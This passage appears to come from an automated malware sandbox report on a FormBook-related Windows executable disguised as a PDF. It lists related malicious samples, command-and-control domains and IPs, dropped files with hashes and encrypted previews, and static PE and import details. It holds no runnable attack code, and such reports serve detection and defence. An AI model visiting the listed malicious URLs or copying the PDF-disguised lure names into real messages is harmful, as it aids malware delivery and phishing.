                                                                        RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                        • www.snyp.shop/4nyz/
                                                                        NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.krshop.shop/5p01/
                                                                        161.97.142.144RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.030002350.xyz/1a7n/
                                                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • www.070001813.xyz/gn0y/
                                                                        PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                        • www.070002018.xyz/6m2n/
                                                                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                        • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                        Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.070002018.xyz/6m2n/
                                                                        Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                        • www.030002613.xyz/xd9h/
                                                                        Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.030002449.xyz/cfqm/
                                                                        PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                        • www.070001955.xyz/7zj0/
                                                                        W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.54248711.xyz/jm2l/
                                                                        IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.030002613.xyz/xd9h/
                                                                        15.204.67.7BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                        • www.madhf.tech/0mwe/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.030002128.xyzAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        www.quicktraze.websiteAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        • 209.74.64.58
                                                                        www.sortcouponspot.shopAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.21.90.177
                                                                        www.xphone.netAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                        • 13.248.169.48

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        HP-INTERNET-ASUSarm5.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.153.204.120
                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.153.33.1
                                                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.153.137.2
                                                                        https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                        • 15.204.241.30
                                                                        la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                        • 15.167.98.235
                                                                        la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                        • 15.143.29.26
                                                                        la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                        • 15.145.76.148
                                                                        la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 15.244.27.210
                                                                        XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                                                                        • 15.235.136.234
                                                                        XUTLbT1Wd1.exeGet hashmaliciousUnknownBrowse
                                                                        • 15.235.136.234
                                                                        AMAZON-02UShttp://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                        • 18.194.154.81
                                                                        https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                        • 52.57.45.42
                                                                        AzureConnect.exeGet hashmaliciousCobaltStrikeBrowse
                                                                        • 54.230.104.116
                                                                        main.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 3.142.129.56
                                                                        AsyncClient.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 3.70.228.168
                                                                        image logger.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 18.141.204.5
                                                                        https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188eGet hashmaliciousUnknownBrowse
                                                                        • 13.226.2.73
                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                        • 54.171.230.55
                                                                        arm5.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                                                                        • 34.243.160.129
                                                                        INV_NE_02_2034388.exeGet hashmaliciousFormBookBrowse
                                                                        • 18.141.10.107
                                                                        Africa-on-Cloud-ASZAnshsh4.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.141.227
                                                                        b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.63.47
                                                                        arm5.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.240.230.2
                                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.246.3.216
                                                                        mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.246.97.104
                                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.204.80
                                                                        nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.63.29
                                                                        hax.spc.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.63.77
                                                                        hax.m68k.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.228.141.216
                                                                        hax.arm.elfGet hashmaliciousMiraiBrowse
                                                                        • 156.246.49.201
                                                                        CONTABODEpayload-c17f7df6-cf80-43d5-8c60-eca90366debb.exeGet hashmaliciousMetasploitBrowse
                                                                        • 178.238.231.204
                                                                        RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.142.144
                                                                        Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.168.245
                                                                        lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.168.245
                                                                        New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.168.245
                                                                        UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                        • 161.97.168.245

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\11r4hY7MK

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\recover.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Cocles

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):288768
                                                                        Entropy (8bit):7.993571632073203
                                                                        Encrypted:true
                                                                        SSDEEP:6144:r/uDDG4SpQs0lpPfNlm1/oopBOx3xnMcMZo7BWkFCARDfFc:r/yDG4Spv0vPfCpoqBcMi7EwfS
                                                                        MD5:E4198548F9D7BCD5883F0CD6F8BC5786
                                                                        SHA1:FB426AD38C75F32A6E5571B3BF706FD3106D5223
                                                                        SHA-256:760D157BDCEDF86631EB7AFF57E606D5FFCA5E1D69B07280DD6ABEFF81E41D64
                                                                        SHA-512:6537DF82248CA4296E95386C23E1581FD7A8D6CFF856B77A0307BD4385AFFCECDB7C73F96EA53C195B7CCE5840F171D6BA39F2DF4B486F28D7FE9E6D7EC15599
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.....R028...X...n.2;...yKB...028E2CQHJA9R028E2CQHJA9R028E2C.HJA7M.<8.;.p.K..sdZQ6.3#'-3X?.QY+\,%h($. E\.,\c...aT=TW.H?IuHJA9R02AD;.l(-..2W..%U.K...2W.".m(-.#....%U..!)).2W.8E2CQHJAi.02tD3CrO..9R028E2C.HH@2S;28.6CQHJA9R02.Q2CQXJA9"428ErCQXJA9P02>E2CQHJA?R028E2CQ8NA9P028E2CSH..9R 28U2CQHZA9B028E2CAHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2C.</9MR02..6CQXJA9.428U2CQHJA9R028E2CqHJ!9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA

                                                                        C:\Users\user\AppData\Local\Temp\apostrophise

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        File Type:ASCII text, with very long lines (28686), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):28686
                                                                        Entropy (8bit):3.573777695419727
                                                                        Encrypted:false
                                                                        SSDEEP:384:YJejrkc2+oeeZ6wPlWrqGhFOI5KJmJEcDoNlLIFa5JQqTN0/0DTYrLfaHhC:+ecVNeeQwPlWr6QJEcDoNe6b/nY3+C
                                                                        MD5:BD3289098BF2094FD605AA8153B015CA
                                                                        SHA1:B9C2E8AADB1AADCF64A8B5FCF9300391D86F8D4E
                                                                        SHA-256:5DB1956153D179D1A4BD5D946C3671AF48C604BD6735419CEE25B553C2F20A2D
                                                                        SHA-512:0247FBF8CD228C9355EDA4726E5FF841FB20B1DFADCC9AABCF33918CA6BC883E0C456E69167DC7FCFCE95219DBB6CDB6BC78BE1D2226ADDBB7A4C0CC14321448
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:6665500000110k558orp81rppp0200005657o86o00000066894584o96500000066894q86on7200000066895588o86r0000006689458no96500000066894q8pon6p0000006689558ro83300000066894590o93200000066894q92on2r00000066895594o86400000066894596o96p00000066894q98on6p0000006689559n33p06689459po96r00000066898q44sssssson7400000066899546sssssso86400000066898548sssssso96p00000066898q4nsssssson6p0000006689954psssssso82r0000006689854rsssssso96400000066898q50sssssson6p00000066899552sssssso86p00000066898554ssssss33p966898q56sssssson75000000668955q0o873000000668945q2o96500000066894qq4on72000000668955q6o833000000668945q8o93200000066894qqnon2r000000668955qpo864000000668945qro96p00000066894qr0on6p000000668955r233p0668945r4o96100000066898q68sssssson640000006689956nsssssso8760000006689856psssssso96100000066898q6rsssssson7000000066899570sssssso86900000066898572sssssso93300000066898q74sssssson3200000066899576sssssso82r00000066898578sssssso96400000066898q7nsssssson6p0000006689957psssssso86p0000006689857rssssss33p966894q80on73000000

                                                                        C:\Users\user\AppData\Local\Temp\aut4B44.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):288768
                                                                        Entropy (8bit):7.993571632073203
                                                                        Encrypted:true
                                                                        SSDEEP:6144:r/uDDG4SpQs0lpPfNlm1/oopBOx3xnMcMZo7BWkFCARDfFc:r/yDG4Spv0vPfCpoqBcMi7EwfS
                                                                        MD5:E4198548F9D7BCD5883F0CD6F8BC5786
                                                                        SHA1:FB426AD38C75F32A6E5571B3BF706FD3106D5223
                                                                        SHA-256:760D157BDCEDF86631EB7AFF57E606D5FFCA5E1D69B07280DD6ABEFF81E41D64
                                                                        SHA-512:6537DF82248CA4296E95386C23E1581FD7A8D6CFF856B77A0307BD4385AFFCECDB7C73F96EA53C195B7CCE5840F171D6BA39F2DF4B486F28D7FE9E6D7EC15599
                                                                        Malicious:false
                                                                        Preview:.....R028...X...n.2;...yKB...028E2CQHJA9R028E2CQHJA9R028E2C.HJA7M.<8.;.p.K..sdZQ6.3#'-3X?.QY+\,%h($. E\.,\c...aT=TW.H?IuHJA9R02AD;.l(-..2W..%U.K...2W.".m(-.#....%U..!)).2W.8E2CQHJAi.02tD3CrO..9R028E2C.HH@2S;28.6CQHJA9R02.Q2CQXJA9"428ErCQXJA9P02>E2CQHJA?R028E2CQ8NA9P028E2CSH..9R 28U2CQHZA9B028E2CAHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2C.</9MR02..6CQXJA9.428U2CQHJA9R028E2CqHJ!9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA9R028E2CQHJA

                                                                        C:\Users\user\AppData\Local\Temp\aut4B83.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\SC_TR11670000_pdf.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):9714
                                                                        Entropy (8bit):7.594779982720446
                                                                        Encrypted:false
                                                                        SSDEEP:192:M7U22a8TDxRMGoftt5E7Z2AA3W0abwNb09W2X/wzxGQl/7Yt1IrxD7bHRA9eL:M7iJPHoftt5+ZBbwNbkozdYMNbRA9U
                                                                        MD5:AB8B3C56FA613D1FC8B5C508765CE882
                                                                        SHA1:2C26F887BF6D3264D6D9C5F093930CEAD4E6DCC3
                                                                        SHA-256:3DBB5E14081D6D5D08D26039D06F3EEA5FEC1A3A1B68E73715BC90F601D8897C
                                                                        SHA-512:EE2FD955DAFE63A2866E0A62633FDFE434FD1CBC12F41DC03FF400167EDEF11E227A1B7659865311513E1877FBF3857E8D4CBA69F8801E14B71ACBEF4F0F6CF7
                                                                        Malicious:false
                                                                        Preview:EA06..p..M..Y......f....qo.\'.....p.L.....k7..&...:a6.N'3I..io....].......K........|...o..o.M.......8.....9.[.30....3....2.Z..k9..6.@.o.l..\......g.9.L.w...\....N..3I.........9..&....r.'.Y...c ....An.H.......F.3<..\..6....`....f@...x..j....Br.....[..0..n3.|.n...\f@5_..h....f.5_..p.U..m.5_....U..n@5_..`.U..@5\..>3...M.^.n.Z..k6.z..o6......@......y..G../Z.M. .....jr.....n.u....$.`./.o8...f.G_T.......@>_.......zk5....i..... ...................`.M..`... ...p...@....'.4...{>K|..c.Mm.@..[..._..p......>Kx#G.o..3|w...G.4..&@8_..kp..i|w.....p.h............7.MnsK....M...;..8..f.0.L..79..f..+..ff6....6.N. ...f...E...Y....3.I.............w............2p....<d....,vb...t....N@!+..'& ....,fo2..n6........r.2.X...c3k..es.Y.!...Gf@....,f.9.N.`. .#7.....c.0.....y..p.h.s.....,vf...|..t.L@...40.....f.....&3....4..@.6.-..p..S....2...S0.N.@.;5.`...9.......k8.....c.P..\.3.wx.....vl........E......y6....p.c3....4..b.!....F ....B5p.L.3........vn.....f....r...B3P.....;8.X...n.............g.....

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.1297433415067
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:SC_TR11670000_pdf.exe
                                                                        File size:1'179'136 bytes
                                                                        MD5:1ead28dad1fae4a2478c61d096a3f162
                                                                        SHA1:503a22eb5ae11321abbce439d4548b037281018d
                                                                        SHA256:62cb069bd0351753a2cca2186257049a8ca4b5eaf3fbc9ef37080d9ec3f58f24
                                                                        SHA512:db8cef63130b7694d0bb866d4ae9c9ec4a3527b93a4027c39d1f8f961d0396444e15636407891a23475e2e77f346c383baf821da6d4c208aa0987e47cb5e91ad
                                                                        SSDEEP:24576:cAHnh+eWsN3skA4RV1Hom2KXMmHalgcMhzcVETYYPQQxQE5:7h+ZkldoPK8Yalg3hIEXxP
                                                                        TLSH:8E45AD0273D1C036FFABA2739B6AF24156BC79254133852F13981DB9BD701B2276E663
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                        File Icon

                                                                        Icon Hash:aaf3e3e3938382a0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x42800a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x674D26E4 [Mon Dec 2 03:17:56 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F6008B9235Dh
                                                                        jmp 00007F6008B85114h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [esp+10h]
                                                                        mov ecx, dword ptr [esp+14h]
                                                                        mov edi, dword ptr [esp+0Ch]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F6008B8529Ah
                                                                        cmp edi, eax
                                                                        jc 00007F6008B855FEh
                                                                        bt dword ptr [004C41FCh], 01h
                                                                        jnc 00007F6008B85299h
                                                                        rep movsb
                                                                        jmp 00007F6008B855ACh
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F6008B85464h
                                                                        mov eax, edi
                                                                        xor eax, esi
                                                                        test eax, 0000000Fh
                                                                        jne 00007F6008B852A0h
                                                                        bt dword ptr [004BF324h], 01h
                                                                        jc 00007F6008B85770h
                                                                        bt dword ptr [004C41FCh], 00000000h
                                                                        jnc 00007F6008B8543Dh
                                                                        test edi, 00000003h
                                                                        jne 00007F6008B8544Eh
                                                                        test esi, 00000003h
                                                                        jne 00007F6008B8542Dh
                                                                        bt edi, 02h
                                                                        jnc 00007F6008B8529Fh
                                                                        mov eax, dword ptr [esi]
                                                                        sub ecx, 04h
                                                                        lea esi, dword ptr [esi+04h]
                                                                        mov dword ptr [edi], eax
                                                                        lea edi, dword ptr [edi+04h]
                                                                        bt edi, 03h
                                                                        jnc 00007F6008B852A3h
                                                                        movq xmm1, qword ptr [esi]
                                                                        sub ecx, 08h
                                                                        lea esi, dword ptr [esi+08h]
                                                                        movq qword ptr [edi], xmm1
                                                                        lea edi, dword ptr [edi+08h]
                                                                        test esi, 00000007h
                                                                        je 00007F6008B852F5h
                                                                        bt esi, 03h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [ASM] VS2013 build 21005
                                                                        • [ C ] VS2013 build 21005
                                                                        • [C++] VS2013 build 21005
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ASM] VS2013 UPD5 build 40629
                                                                        • [RES] VS2013 build 21005
                                                                        • [LNK] VS2013 UPD5 build 40629

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x556d8.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x7134.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0xc80000x556d80x558004e23b2c37d293c24565dc93788680cf6False0.9229800575657895data7.884330399558395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x11e0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                        RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                        RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                        RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                        RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                        RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                        RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                        RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                        RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                        RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                        RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                        RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                                        RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                        RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                                        RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                                        RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                        RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                        RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                                        RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                        RT_RCDATA0xd07b80x4c99edata1.000337839991331
                                                                        RT_GROUP_ICON0x11d1580x76dataEnglishGreat Britain0.6610169491525424
                                                                        RT_GROUP_ICON0x11d1d00x14dataEnglishGreat Britain1.25
                                                                        RT_GROUP_ICON0x11d1e40x14dataEnglishGreat Britain1.15
                                                                        RT_GROUP_ICON0x11d1f80x14dataEnglishGreat Britain1.25
                                                                        RT_VERSION0x11d20c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                        RT_MANIFEST0x11d2e80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                        Imports

                                                                        DLLImport
                                                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
